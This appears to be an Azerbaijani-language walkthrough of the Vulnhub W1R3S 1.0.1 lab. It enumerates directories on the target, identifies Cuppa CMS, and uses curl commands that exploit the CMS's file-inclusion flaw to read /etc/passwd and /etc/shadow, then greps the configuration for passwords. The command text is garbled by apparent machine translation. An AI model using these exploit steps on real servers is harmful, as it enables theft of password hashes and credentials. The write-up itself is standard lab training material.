WEb tətbiqetmələrinin nüfuz sınaqları zamanı hədəf tətbiqindəki zəiflik səbəbi ilə gözlənilməz fayllar veb tətbiqetmə tərəfindən icra edilə bilər. Bu yazıda, edilməsi Fayl açığı ilə bağlı Cuppa CMS W1R3S: 1.0.1 virtual maşın istifadə olunacaq.

Məqalədə istifadə olunan W1R3S: 1.0.1 virtual maşını Vulnhub saytından yükləyə bilərsiniz .

https://www.vulnhub.com/entry/w1r3s-101,220/

Apache xidməti virtual maşının TCP \ 80 portunda işləyir .

http://192.168.106.129

Github- dakı dirsearch vasitəsi tətbiqdəki qovluqları tapmaq üçün istifadə edilə bilər.

git clone https://github.com/maurosoria/dirsearch.git

cd dirsearch

./dirsearch.py ​​-u http://192.168.106.129 -w /usr/share/dirb/wordlists/common.txt -e * -t 3

” Rekursiv ” seçim dərin araşdırma üçün dirsearch alətində də istifadə edilə bilər.

./dirsearch.py ​​-u http://192.168.106.129 -w /usr/share/dirb/wordlists/common.txt -e * -t 3 -r -R 4

Kəşf edilmiş ” administrator ” qovluğuna getdiyiniz zaman avtomatik olaraq ” quraşdırma ” qovluğuna yönəldilir.

whatweb http://192.168.106.129/administrator

Quraşdırma səhifəsində və ya “İrəli” düyməsinə vurulduqda Cuppa CMS-dən istifadə edildiyi görülür.

Cuppa CMS ilə əlaqəli zəifliklər araşdırıldıqda, LFI / RFI zəifliyi aşkar edildi.

searchsploit cuppa

searchsploit -m 25971

Zəiflik detalları araşdırıldıqda, alertConfigField.php sənədindəki nəzarətin olmamasının zəifliyə səbəb olduğu görülür .

Cuppa CMS-in mənbə kodu zəifliyi görmək üçün internetdən və ya virtual maşından əldə edilə bilər. Zəifliyin Cuppa CMS-in ən son versiyasında davam etdiyi görülür.

• https://github.com/CuppaCMS/CuppaCMS
• http://cuppacms.com/files/cuppa_cms.zip
• http://192.168.106.129/cuppa_cms.zip

 

” AlertConfigField.php ” sənədinin 77-ci sətrində məlumatların müştəri tərəfindən birbaşa ” daxil ” funksiyasına göndərilə biləcəyi və server tərəfində heç bir nəzarət edilmədiyi görülür.

<div id = ”content_alert_config” class =
”content_alert_config ”> <? php daxildir “../components/table_manager/fields/config/eace.@$cuppa- > POST (” urlConfig ”); ?>
</div>

Zəiflikdən istifadə etmək üçün bir veb brauzerdən istifadə edildiyi zaman, gözlənildiyi kimi, ” qıvrım ” vasitəsi URL kodlaşdırmaqla istifadə edilə bilər , çünki cavab gözlənildiyi kimi alınmır .

curl -s –data-urlencode urlConfig = .. / .. / .. / .. / .. / .. / .. / .. / .. / etc /

passwd http://192.168.106.129/administrator/alerts /alertConfigField.php

| grep “class = \” content_alert_config \ ”” -A50

Oxşar əməliyyat / etc / shadow üçün edildikdə , faylın oxuna biləcəyi görülür.

curl -s –data-urlencode urlConfig = .. / .. / .. / .. / .. / .. / .. / .. / .. / etc /

shadow http://192.168.106.129/administrator/alerts /alertConfigField.php

| grep “class = \” content_alert_config \ ”” -A50 | grep -home “: \ *:”

Qeyd: Bu virtual maşın üzərində Cuppa CMS işləyən Apache tətbiqetmə istifadəçisinin ( www-data ) standart bir hesab olduğu görünür. Bununla birlikdə, bütün istifadəçilərin ( Hər kəsin / Başqalarının ) / etc / shadow faylının məzmununu oxumağa və yazmağa icazə verildiyi üçün , əməliyyat sistemindəki istifadəçilərin parol xülasələri ” www-data ” istifadəçisinin icazəsi ilə oxuna bilər. .

netstat -nlpt

ps -ef | grep 1488

qrupları www-data

ls -la / etc / shadow

Virtual maşında Cuppa CMS-nin konfiqurasiya faylı araşdırıldıqda, standart sənədlərin dəyişdirildiyi görülür.

cat Configuration.php | grep -i ‘$password’ -A3 -B3